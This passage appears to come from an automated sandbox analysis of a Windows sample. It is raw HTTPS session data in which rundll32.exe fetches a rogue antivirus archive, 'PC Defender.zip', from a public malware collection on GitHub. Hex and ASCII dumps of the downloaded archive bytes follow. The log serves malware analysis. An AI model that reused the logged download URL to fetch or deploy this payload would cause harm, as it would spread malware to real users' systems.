                                                                                                                                                    2022-09-29 12:59:14 UTC27095INData Raw: e3 27 c9 bb 1e 20 33 3b a2 07 91 77 a2 97 e9 64 c6 b0 f9 8d d6 c5 eb 5a c6 8d e9 96 f6 56 7d 95 9e 17 c9 b2 4a c7 e3 ef 1b 9b 5b dd f3 b6 29 65 f8 46 94 b0 ba 0f 65 95 50 ce 5b 0f 58 cc 32 14 5f 63 36 76 f0 ff af 35 53 a1 59 49 86 37 18 91 0e c0 d7 cf 66 8b e3 86 49 8a 2b 53 20 fc 31 f7 6e 0c 2e ac 2a 62 43 8d da 2d 4d 78 9c 15 38 19 ed 47 ad 0d a6 c9 f5 e0 ee 5e 83 83 7b 34 75 00 bc 77 a8 4d dc 6c 9f d2 ad 9e 39 59 14 49 04 db 85 8f d4 c9 1c 9f ee f7 97 9b 38 17 02 7b d6 35 6a 1a 25 25 35 5d 7f 3c 50 40 a8 52 35 4d c3 ad d3 91 c3 08 39 b4 5f 54 0c b4 0e d8 e4 c8 c8 de 0e e2 a9 f3 b3 47 10 d4 c9 8d 3b e5 01 33 9a 8f fe 29 03 28 69 ce 4d 4c 80 2f f8 f4 aa c2 89 ea cb 4b cb b2 3f 7b 6f 4b 1c bc f9 16 20 74 3e 52 02 ff d6 6c b7 5e e5 ff ef 50 26 a9 c8 fb 7d
                                                                                                                                                    Data Ascii: ' 3;wdZV}J[)eFeP[X2_c6v5SYI7fI+S 1n.*bC-Mx8G^{4uwMl9YI8{5j%%5]<P@R5M9_TG;3)(iML/K?{oK t>Rl^P&}
                                                                                                                                                    2022-09-29 12:59:14 UTC27111INData Raw: 02 e2 d9 40 ff 50 67 29 9c ac 90 cc 79 b3 ac 1a 09 dd 39 80 84 12 6e e5 8b 75 e4 54 53 4a 3e 56 95 5a a1 7b 33 50 5d 96 1e e4 a2 8b 76 be d4 bf 38 84 65 53 9b 89 c3 42 8b c5 3b 11 c8 15 26 94 0e 03 d2 70 f3 8c 8b fd b8 3b 88 47 84 01 56 fa 28 5c 88 0b 35 7f e2 70 0a 51 17 66 ea b6 ae 05 22 b6 fc ae ef 89 08 dc 49 ab 0c 16 17 48 9a 2b 97 78 cb b6 b4 ab 5f 6a a2 a0 2c bb 22 8d 5a 9b e5 f2 a1 88 bd 8f fc b4 d8 e0 42 14 bf 53 c9 68 1d fa 88 14 a3 c3 54 77 05 05 7a b7 a1 65 57 4b d2 67 9f ad 77 73 88 7b 59 68 1c 71 6c 78 4e 4f 72 10 2a 0e 9f de bd fb 15 e5 e1 bb 21 c4 bf 5f e4 71 02 1f c9 bb cb 8f 5d 3c 07 fb ae 79 59 02 c8 58 55 f9 df 6c 35 d9 ce 7c ce 4e 35 68 07 3a 72 aa 94 05 27 3c 86 2a fc c2 44 1f 48 07 ee 69 06 69 a1 55 1c dc 01 39 7b 19 e6 23 99 0f 79
                                                                                                                                                    Data Ascii: @Pg)y9nuTSJ>VZ{3P]v8eSB;&p;GV(\5pQf"IH+x_j,"ZBShTwzeWKgws{YhqlxNOr*!_q]<yYXUl5|N5h:r'<*DHiiU9{#y
                                                                                                                                                    2022-09-29 12:59:14 UTC27127INData Raw: 88 07 e6 89 a0 aa f2 0c 9a bc 40 ed 40 07 77 39 86 50 fd f9 02 a7 e0 00 f3 50 22 c9 31 30 13 4c 15 d9 20 cd 5a 86 e1 7a 01 09 df 58 8b 89 d0 5d 66 71 d2 e2 cd b3 91 ab 9e 1f 44 4c 83 09 fa b6 5b 30 eb 52 5e c6 57 78 73 20 31 28 0b cf 15 8b c8 a8 05 14 5e 54 a0 b5 f5 c1 ea 78 b2 28 6e a7 f7 81 45 d9 22 9e 9c 5f 25 87 63 7e b0 17 2d 51 0a 0f c8 b7 6a 08 57 0e 35 cf a4 3e d1 11 fe dc d6 15 6e 5f 33 8b eb 6c 6a fb 34 a9 05 0a b3 7f 8f 1e d8 01 14 c0 c4 96 bb 9a a7 0e 94 34 3b b9 fe 90 5e 76 0a 7c 21 bb ec 6a 28 04 19 8e 3d 70 c8 d6 f7 64 37 50 22 98 99 79 db 35 3d a8 7f ab df d1 28 77 4f 45 36 b1 db bf 75 e1 ff c5 c0 38 36 18 02 6f ed c4 02 90 b0 e6 7b 6a 62 05 bb db b5 27 2f c3 7b c9 a6 e2 90 af 9e 7b 2e 11 f4 d9 ae 23 d8 ac f9 3f 2e 83 8e ed 00 aa 3e 6c 7a
                                                                                                                                                    Data Ascii: @@w9PP"10L ZzX]fqDL[0R^Wxs 1(^Tx(nE"_%c~-QjW5>n_3lj44;^v|!j(=pd7P"y5=(wOE6u86o{jb'/{{.#?.>lz


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    101192.168.2.349758140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:18 UTC27140OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/PC%20Defender.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    102140.82.121.3443192.168.2.349758C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:18 UTC27140INHTTP/1.1 302 Found
                                                                                                                                                    Server: GitHub.com
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:18 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                    Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zip
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                    Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                    2022-09-29 12:59:18 UTC27140INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    103192.168.2.349759185.199.108.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:18 UTC27142OUTGET /Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zip HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    104185.199.108.133443192.168.2.349759C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:18 UTC27142INHTTP/1.1 200 OK
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 857943
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/zip
                                                                                                                                                    ETag: "738aade4b65e8d55bc499c1fb84c57dfe29cfd2ed7020abafa8928ad4af9df68"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    X-GitHub-Request-Id: BC88:67BA:7D00:C44DC:6335935E
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 29 Sep 2022 12:59:18 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-mxp6956-MXP
                                                                                                                                                    X-Cache: HIT
                                                                                                                                                    X-Cache-Hits: 1
                                                                                                                                                    X-Timer: S1664456359.682711,VS0,VE162
                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Fastly-Request-ID: 6cd6e6885ac22a9a5ebdce164de5a2e3870cc150
                                                                                                                                                    Expires: Thu, 29 Sep 2022 13:04:18 GMT
                                                                                                                                                    Source-Age: 0
                                                                                                                                                    2022-09-29 12:59:18 UTC27143INData Raw: 50 4b 03 04 14 00 01 00 08 00 b5 6e 76 3c 8d 65 a2 b8 9f 16 0d 00 fe b9 0d 00 19 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 43 44 65 66 65 6e 64 65 72 2e 65 78 65 c0 3f 16 f4 90 05 1f 72 a9 d7 14 6f e9 0f f9 e9 0c f1 a5 34 cc d0 b4 ad 49 9b 03 12 30 a4 5d b9 f3 f6 75 39 05 17 df 5c f2 dd ee aa bb e1 c2 73 4e ce 44 4b 40 f5 b8 2f df 0a 94 61 7e 5b a5 25 1c 40 89 cb 6e 1d 85 89 fd 7d b0 81 37 c8 fa a3 ea 88 c5 8c f5 74 a9 91 b4 3b bb c6 30 3d 10 ad 12 d2 7c c5 74 87 a3 f5 84 10 00 94 6c ae c3 b7 98 b3 38 ca e0 21 e8 8e af 57 b0 09 80 04 ce 23 d3 71 2a 42 8d b1 bb 7b 99 f9 53 b6 2c 07 79 ec c3 94 8e c9 1f cf 0d 2c 8e b4 97 32 76 13 0d 41 25 78 95 b2 3c dc b9 df 7b e1 6e 51 0e 8f aa 19 53 3e 94 42 8c 90 08 02 ce 1f 82 87 24 da 62 28 48 39 ba 48 89 e3 93 fa
                                                                                                                                                    Data Ascii: PKnv<eEndermanch@PCDefender.exe?ro4I0]u9\sNDK@/a~[%@n}7t;0=|tl8!W#q*B{S,y,2vA%x<{nQS>B$b(H9H
                                                                                                                                                    2022-09-29 12:59:18 UTC27159INData Raw: 80 8f 81 a5 74 9e 46 7f d0 d9 60 2c 64 53 c9 e4 47 c6 ee d6 22 56 56 47 70 3f 6d 75 98 fa 4a 75 58 a6 c4 2d 73 06 df e3 08 f1 a8 29 51 c2 23 60 6c d6 f3 4f 18 c3 d1 e2 de 30 fd a5 e0 80 d7 9c a7 63 54 16 c7 a7 04 91 ac 05 e2 59 3d ec 6b 9a b5 97 ce dc fc 74 86 d3 eb f8 8f 06 c8 8e 12 8d 07 ce b7 99 e3 fe f1 b2 b2 26 c2 11 28 c8 0e 88 72 a1 d0 fa 16 a4 f5 ae 4c c0 fa c7 87 f0 bb 4a ba e9 69 ea 01 b3 46 95 97 c1 7d 7d 9c 39 87 f7 99 46 20 3f 7d af b4 52 e4 e5 fb 6e f3 a6 c5 5b 69 93 a6 cf 1b 30 6b 10 3a 02 1d fa 78 3a f9 cf 9c 03 57 d7 64 e1 79 0e 9d ef a9 92 07 a1 4b 66 d4 f2 cf 23 a7 0e 8a 69 ff 7d 7c 1e 39 c3 58 c3 dc 61 7f b4 8e 3d f5 c7 a5 d4 a8 6d c0 27 71 c9 39 e3 ce 3a 3f c3 13 e2 71 bb 51 1f 96 27 f4 f9 ce a5 e7 77 c2 dc db a0 1c c9 f6 c1 b9 9a d1
                                                                                                                                                    Data Ascii: tF`,dSG"VVGp?muJuX-s)Q#`lO0cTY=kt&(rLJiF}}9F ?}Rn[i0k:x:WdyKf#i}|9Xa=m'q9:?qQ'w
                                                                                                                                                    2022-09-29 12:59:18 UTC27175INData Raw: e5 70 37 6b 58 86 6b 90 6b 8a 3d 01 61 06 34 5e 91 49 db 22 29 28 8c de 89 07 7a be fd 05 b8 58 e6 f7 eb e3 a8 54 ef d9 f9 ad 87 b0 70 26 a3 33 b7 05 c6 83 65 43 34 fa 59 4d 28 36 23 ab 1c 15 d2 7b 1e 48 2c 24 da 8d 84 a2 98 42 53 4a 12 52 34 34 05 cf ad 5c 90 31 f4 d6 ff 48 f7 6d 92 9c 6d 8f 38 ed 74 be fe b9 2a 0e 63 82 eb 0d d7 37 7a 35 71 4f 34 0b d8 8b 21 18 7f c5 53 58 e3 10 a2 5a 46 27 1a 88 de 44 30 ec 80 e0 c5 7c 6f 69 9e b5 cd f2 4e 42 a0 30 45 92 13 24 48 da 18 0e 13 eb d9 92 6b e0 40 97 29 76 53 ad 7c 39 89 27 ea 81 e5 fd 41 1d 6d ad e2 0f 7b 03 03 e8 4b fe b3 cf 47 f4 1a 81 a9 78 de ef e2 05 a5 00 89 fe f8 68 c5 2b e1 66 48 c9 04 0d fc 2a 39 a8 3e fc 35 a4 54 08 5b db ca 53 60 00 4f 72 74 e5 cb 09 3a 71 c7 c6 f7 dc 23 c4 23 92 ab e6 46 56 fa
                                                                                                                                                    Data Ascii: p7kXkk=a4^I")(zXTp&3eC4YM(6#{H,$BSJR44\1Hmm8t*c7z5qO4!SXZF'D0|oiNB0E$Hk@)vS|9'Am{KGxh+fH*9>5T[S`Ort:q##FV
                                                                                                                                                    2022-09-29 12:59:18 UTC27191INData Raw: 94 a0 e4 fe a6 b6 be 37 d8 94 2c 35 99 78 0f 44 f2 d0 5e 43 84 cd df 93 aa 7c d4 73 53 78 fc ea e4 ea d3 76 21 ee a2 4b a9 37 b1 7f 5a ad 32 f1 c3 60 1a 07 e2 49 79 15 76 39 a4 e4 e2 55 ff 52 88 73 3e ba 1a c4 2b 99 19 0b 84 6d 52 c1 d5 db 86 bf 69 86 8a 36 14 76 08 6f c6 bf a6 a6 f0 63 3d ce 4c 04 3f 74 87 38 78 75 84 c7 cf 1e 1e 2d 24 d5 86 f3 dd b0 6b 95 91 f9 80 3b 28 07 94 48 92 6c 84 53 5b 05 17 38 f8 02 9b 21 a0 98 27 25 37 a9 7b 9f 30 09 60 67 2c da 36 52 df 66 e7 df 85 0c fb 35 9e da f0 a3 a8 10 5c 3d 51 da 42 73 01 d0 39 05 63 91 cf b1 c6 09 0d 36 1b ca 1c e6 0e 80 dc b1 f4 42 5b 47 b1 a2 60 de 98 80 28 51 dc ce 63 df ff a5 9d 51 1e c6 63 8a 20 1c d5 bd 68 2e 1e 80 28 ed 9a 6c 22 99 95 da 27 5d 57 42 cc 19 80 35 35 b3 91 88 4e a5 d0 dd 39 43 09
                                                                                                                                                    Data Ascii: 7,5xD^C|sSxv!K7Z2`Iyv9URs>+mRi6voc=L?t8xu-$k;(HlS[8!'%7{0`g,6Rf5\=QBs9c6B[G`(QcQc h.(l"']WB55N9C
                                                                                                                                                    2022-09-29 12:59:18 UTC27207INData Raw: f8 7e 84 9e ad 9f f9 1b 49 ea 1a 50 39 da f2 eb 73 26 42 70 66 35 92 79 90 5b 62 d2 51 15 f8 e9 71 8b bc 6b 6c f0 44 59 93 fc de a5 b4 29 65 2b 3b 9f 41 57 2d 97 bb f9 ce bd 4a f7 5d 40 99 b5 f7 c0 af 81 d0 11 dd 3f 63 6f 86 19 8f a3 96 d2 8f e9 dc 9a 30 15 cf 95 cc 36 f8 99 80 15 98 bd 7c 0f dd 2f b3 df 99 10 38 c1 48 0c 0e 1c 6f 49 e0 4c 9a 53 2e 87 f1 c5 11 a2 0b 1d 1d 86 f0 aa e5 99 16 14 3f 77 28 66 25 9d 13 9b 35 e6 c2 30 2e 2d 66 3f cf 8e 09 b0 ae 24 90 b1 e0 91 59 db 6b 25 5a 4d 7d 00 c6 9e 92 d5 78 28 27 80 f7 a6 e7 3d a3 75 6a b9 f8 fe 31 e9 ee 63 9f 3c f5 ae 94 57 82 fe 1f 41 c2 99 c9 77 0a 85 1b 6b c6 8a da c8 91 28 b1 f0 91 eb 3b 40 a7 de 77 55 e6 39 b3 92 29 a6 ec 10 33 9e 69 5e 4d 3c 7c 83 5a a1 c6 e6 69 94 80 09 08 bf bb 8f 9e 8a ce 45 d1
                                                                                                                                                    Data Ascii: ~IP9s&Bpf5y[bQqklDY)e+;AW-J]@?co06|/8HoILS.?w(f%50.-f?$Yk%ZM}x('=uj1c<WAwk(;@wU9)3i^M<|ZiE
                                                                                                                                                    2022-09-29 12:59:18 UTC27223INData Raw: 6d f1 4c 31 4e e6 64 34 03 b8 5b 01 6c 4f 4d 01 d9 aa 79 92 02 3a c4 69 02 49 82 38 9a 20 e2 8b 64 a0 72 3c 0c 6d f3 d1 ee 15 84 cb e4 08 6c e0 be f7 34 be d5 4b 04 f1 3c 13 91 12 16 4b 78 17 fd 9e de 32 81 ad de 5b 81 d5 13 a9 1d 1b 14 0b 7d 00 c4 06 e8 c4 7d 02 2d cc d1 ff 54 64 73 52 1c f5 c1 77 09 65 ec 89 61 8f f9 22 6d 5c 48 25 4d 47 65 b9 d7 db 77 ed e4 86 40 26 07 1d 2f 10 82 03 24 cb f4 f5 41 6d c1 31 38 1d 06 33 b3 24 19 f9 ec 36 9a d6 5d 64 d4 63 98 00 a6 35 7f 3f 6b eb 26 31 91 b2 a9 94 61 0e 6a 0b 3b be 8f 56 d8 85 df b4 af 0d 79 58 82 aa 3b 19 34 fc 43 8f 48 39 1d ed 45 91 dd d8 1c 29 0c 18 07 a7 53 8c 26 d4 ad fe 50 d0 25 b1 e8 0f 9f 1e 88 1f 8b ba 4d 06 ba fd 97 9c 1c a9 9e 3e 30 b7 21 99 25 7e 60 92 2c 54 83 db 25 68 53 16 83 a9 23 09 2d
                                                                                                                                                    Data Ascii: mL1Nd4[lOMy:iI8 dr<ml4K<Kx2[}}-TdsRwea"m\H%MGew@&/$Am183$6]dc5?k&1aj;VyX;4CH9E)S&P%M>0!%~`,T%hS#-
                                                                                                                                                    2022-09-29 12:59:18 UTC27239INData Raw: ae 04 6a b4 15 37 01 ce 6a 75 22 ef 1e c7 0c d0 b1 d7 5a 7a dc d4 77 04 25 9f c3 50 46 54 c5 f0 98 5b 04 a5 6b d9 93 8b 49 27 21 6d ae 23 e3 73 4d 67 8d 88 47 e2 c8 f3 70 15 be 51 94 ba 49 05 0b 8e d6 61 c8 a1 50 a2 25 17 1b 81 dc 0d b8 d4 29 5e 8d 78 a7 6d a1 2c a6 7a 39 4f fd 1a de b5 56 01 78 ae f6 64 9e 25 38 08 0e 63 f1 61 81 dd f6 5e 1f 91 ea b2 be 89 c2 48 39 51 cd a4 60 b5 aa 2a e0 68 12 11 34 9e 42 40 42 c6 a0 1d 32 96 65 9e 4a 27 df 8c 43 b7 8c 77 f3 d8 4c d5 09 78 cc f6 ca 83 b3 8e 6c 55 96 66 92 8b 1a ff a7 2c e8 66 be e5 e5 c3 1c 4c ae 08 10 b5 cb a7 0e 6e a4 07 42 1a e3 63 9f 59 30 1b 9a f9 f7 65 2d eb db 31 bb bd fc 3b 37 cd 17 c5 e8 54 7b be a0 a8 e7 ed 4d 4e 15 46 8c b5 56 f3 1a bb ae 52 b2 97 e6 49 fc a4 40 b9 d4 d8 cf 1f 1a 52 36 0d 7c
                                                                                                                                                    Data Ascii: j7ju"Zzw%PFT[kI'!m#sMgGpQIaP%)^xm,z9OVxd%8ca^H9Q`*h4B@B2eJ'CwLxlUf,fLnBcY0e-1;7T{MNFVRI@R6|
                                                                                                                                                    2022-09-29 12:59:18 UTC27255INData Raw: be ba 1a f8 29 46 14 fa 19 15 d7 5d 24 b7 af ba bb 61 70 4d e4 0b 00 95 3c 72 1a 9a b0 9c 0b 2d 24 ee ea 46 36 c6 78 76 fb d0 65 03 e3 b4 c4 d7 f9 ce 3f 97 fc aa d8 d6 b3 52 3f 9c 26 9a 6e 14 ca d3 db c8 1a 92 d6 c7 a5 fc 91 83 f8 53 1b 84 76 0e 14 b3 b6 01 bc aa 24 05 ec 48 ca f2 41 2b 88 10 68 3c 3e 82 59 eb 01 75 29 4c ce d7 b5 8d 3f 8c 23 49 df ce 83 27 e9 4a 4c 35 c1 17 5e 75 2d c8 92 c0 95 0e 6f 0c 43 7c 9f 81 f3 53 31 e7 f6 d2 17 72 ac d6 98 90 2e ef 56 b1 88 2c 2f 3d 74 ec 77 5f fe 0f f7 a0 42 05 e4 e3 9e f3 de 84 9e fd 79 ca 90 e3 56 3f 33 0e 26 ac 7e f7 32 32 11 19 03 60 00 a6 d4 25 f1 97 84 18 1f b6 91 a9 2c da 6d 8f 9e 2b 43 df 9d ad b4 9b c0 e6 ff 32 6c b4 c7 f4 9a 08 37 af 48 d5 de 8f b6 96 1d fc a9 44 70 a5 11 0a 09 6e f9 b1 e4 e4 4f 85 be
                                                                                                                                                    Data Ascii: )F]$apM<r-$F6xve?R?&nSv$HA+h<>Yu)L?#I'JL5^u-oC|S1r.V,/=tw_ByV?3&~22`%,m+C2l7HDpnO
                                                                                                                                                    2022-09-29 12:59:18 UTC27271INData Raw: 5f 61 65 c5 98 24 76 bc 7d 22 fa b3 cd 0c 7b 95 fc 16 bc 10 1e 5d 09 e3 5a d5 62 7d c9 95 f5 89 81 b5 36 7f 17 0e f7 70 d3 b8 cf d7 b5 da 3d 14 9f d4 35 3a 40 4d 42 8c 9c 35 7f 77 73 ac 64 ec 51 22 7c a4 96 f3 b7 9e c8 45 df dc 6d 28 ca 86 87 64 31 56 c4 cf 52 7c a5 5f 54 06 a2 ee 2e c9 56 e5 2b 14 46 0c 70 b6 a0 1b cd 0a e2 76 6e 39 d0 db d7 20 da 4b 17 18 40 9f 0a 98 7d 12 b3 cb 78 13 b1 f8 fc be 9b ec 0d c1 c0 1f 20 47 c4 7b 75 04 f2 8e b2 a9 ff 0e 41 e6 45 b8 25 49 aa e2 f6 c8 73 82 29 c9 36 f5 0f da 2a 53 2a 41 35 a5 9f 20 00 f3 da 91 bf e3 f7 e9 f6 30 05 69 50 09 28 41 a9 ab e6 9c dc 44 64 91 bf d5 47 30 76 18 e2 e1 a1 4f 3d b3 18 c6 06 bb 00 71 77 34 79 b6 dd a4 c7 6e 3d 24 94 81 74 5f db a2 b4 ee db 70 e6 8d 79 1f 2c 0b 56 ff 51 3c a5 16 ae 15 a9
                                                                                                                                                    Data Ascii: _ae$v}"{]Zb}6p=5:@MB5wsdQ"|Em(d1VR|_T.V+Fpvn9 K@}x G{uAE%Is)6*S*A5 0iP(ADdG0vO=qw4yn=$t_py,VQ<
                                                                                                                                                    2022-09-29 12:59:18 UTC27287INData Raw: e9 57 7c 02 be 62 5e 37 da 34 fb 7c e5 07 f2 60 0c d1 47 8a 28 e1 97 6e b4 a4 a4 49 b8 47 df 54 a5 e4 f0 e4 1b ff b5 22 a1 5e 64 fe 87 a5 59 56 87 30 3d 4d 99 9c fd d4 82 a7 d3 46 43 57 b6 b1 84 b4 92 17 56 8a 19 f3 e1 e6 13 0c f9 fc 64 63 f5 c1 d4 ce d1 db 95 0f 29 e4 99 f7 d9 97 03 55 47 95 01 08 8e 9e 42 2f e1 cc 10 f7 fd bf 39 0a 13 44 b5 fb 82 43 e9 6a 23 e5 12 e9 21 ab 60 d0 fb 20 6b 95 04 e1 e6 72 35 01 4b 8a 15 c3 85 2a ce 18 45 42 b0 d5 db 15 0a b7 bd 77 bc b9 4e fa 6f 97 84 c3 e2 35 16 ad 04 66 bd ed 58 2b cb 08 b0 8c f2 dc 63 29 1f 0f c3 b1 b9 08 27 23 7c fa c2 69 d7 61 59 09 e2 c2 d8 9a 1e 71 6f bf 74 e8 e4 e9 af 76 46 c7 ee 9c e2 b6 b2 bf 21 61 cb b7 ee d0 6b 4b 4e 74 07 1f a7 3c c5 cd e0 e0 33 fe 61 80 83 1f 67 0c a9 f1 be 36 97 25 5d b6 07
                                                                                                                                                    Data Ascii: W|b^74|`G(nIGT"^dYV0=MFCWVdc)UGB/9DCj#!` kr5K*EBwNo5fX+c)'#|iaYqotvF!akKNt<3ag6%]
                                                                                                                                                    2022-09-29 12:59:18 UTC27303INData Raw: 89 9d 4f c0 73 b1 0e 26 4b 25 dc c2 66 e7 7f 09 42 bf 8d 32 d9 09 53 23 75 06 a2 cb 3e 51 51 4a f6 d1 73 86 67 88 da d3 83 11 20 a5 41 98 00 16 cc b1 a6 ca 20 99 62 24 74 6c a1 6d a6 26 f4 3b a6 67 01 92 ce c5 ca 39 62 27 d1 93 99 60 5b 59 a8 27 8e 74 9e dc 90 74 bc 54 b3 da 2e 93 14 90 48 d6 48 70 ec c8 a0 b0 c0 f9 26 ec 7f f3 4d 3b aa 41 db 04 7a 05 77 69 53 7c b0 01 54 06 84 7d ba 4a dd aa e9 7a 45 7f f6 a3 ab e2 50 9f e5 e1 b1 b8 6d 14 8b 2c 6c 33 8a c2 78 58 be 77 04 8e 98 dc c9 64 66 0e e3 1d 78 8b 83 84 bd df 5c 9b 1e ad 48 1f 1c 87 4c 9c 04 9c 54 8f 6f 64 e7 4d ca bf dc 03 99 05 af 9f c0 24 c1 76 74 39 f6 94 87 45 f9 f7 5d 32 e7 69 62 2d 78 dd 74 bc cc 34 20 30 1f 2b ec bb ad 57 fb e3 7c 06 35 fc 1d 61 bb d0 51 eb 32 16 02 b3 32 18 29 42 5d a8 27
                                                                                                                                                    Data Ascii: Os&K%fB2S#u>QQJsg A b$tlm&;g9b'`[Y'ttT.HHp&M;AzwiS|T}JzEPm,l3xXwdfx\HLTodM$vt9E]2ib-xt4 0+W|5aQ22)B]'
                                                                                                                                                    2022-09-29 12:59:18 UTC27319INData Raw: 8a 83 c9 af 30 44 29 70 6b b0 6b 91 a6 72 42 20 ab de f7 f6 3f 8f 1e f3 8f 95 bb b1 1a 1c e0 05 8e 6d c4 4a 8c 40 93 8f c2 b3 2c af ad ab 07 bd a5 33 86 bf 05 b2 41 cd e7 16 db 07 8f fb 89 b8 e4 27 1a a2 bc 08 7b 87 1d eb ff 59 12 8b 30 95 a1 b9 7c 6f 2d 15 65 52 77 9b 9e 6e 06 6f 26 e9 ae b2 b6 1b 19 9f 54 e6 b9 44 58 92 36 7c 00 6e ce df a7 0c 9a 24 2f fb 92 af 54 ff e1 10 c1 74 ed 13 7e 1b 24 ed bc d2 fa e2 99 9f 8f 13 06 85 8a 7b d8 19 97 92 da 0e 0d cd 60 0c 44 14 b8 28 29 9f cc 5f dc 22 f6 7a 24 21 dd a7 75 77 57 22 6a 1a 07 7e 5e 3c 5e 31 96 57 da 0d 1d 3e 09 05 e5 33 6b e0 d4 66 3e 29 87 a8 93 fb 91 d6 1f c4 0b 9d 7e 11 c7 29 66 ef 5f 5e 4a 14 e2 5b 1c fe fe 01 71 5c 78 86 9a fd 57 ec b8 c1 17 7b 3f 33 40 bc 08 0e 8d a0 67 3d 7d f5 62 e7 04 4c e1
                                                                                                                                                    Data Ascii: 0D)pkkrB ?mJ@,3A'{Y0|o-eRwno&TDX6|n$/Tt~${`D()_"z$!uwW"j~^<^1W>3kf>)~)f_^J[q\xW{?3@g=}bL
                                                                                                                                                    2022-09-29 12:59:18 UTC27335INData Raw: 69 2c 92 79 63 f1 87 83 f0 31 06 08 64 82 ff 98 bf 8e 46 b9 7b 5a fd cd 63 d7 69 92 23 a0 4b 30 46 81 46 23 b7 db 3d 06 2f 17 52 11 1d 69 a4 f8 00 1d 15 3c 0b d3 d6 64 9f fb 77 ac 81 22 41 ee 91 ba d8 2e 35 3f 98 34 a2 50 cb 82 83 c1 48 09 a9 6d 09 e0 f5 7b 94 bd 35 bf 97 d2 ff 85 2e 78 e4 d9 63 96 ca 3a 32 cc 0c 60 ee cf 19 2a ca f4 af 6c 5b 4a ef f4 f6 38 91 c4 c1 9e 59 d1 77 d4 76 97 e0 91 e5 58 ec cc c9 87 0b 63 5d b2 0d f2 c0 5a bb fe cf 34 00 c6 06 08 af cc c7 2f f2 ce 26 30 be 5c ce 1c d7 37 4d 6e 51 82 f2 f7 42 c1 ab c6 c7 34 fc 40 20 da 45 12 52 94 25 b1 95 05 69 f3 0a c6 cb 47 d2 33 9b 8c ea 24 0c dd 7f 00 b9 78 96 9d 9b 65 45 2b 48 c5 12 d8 d4 f0 71 48 3d 09 08 eb d4 9d 53 ea 3e 8f 07 8b 73 d5 fb 59 a3 2c 85 73 1d f0 e2 a4 c5 04 90 ba 9c 0f 97
                                                                                                                                                    Data Ascii: i,yc1dF{Zci#K0FF#=/Ri<dw"A.5?4PHm{5.xc:2`*l[J8YwvXc]Z4/&0\7MnQB4@ ER%iG3$xeE+HqH=S>sY,s
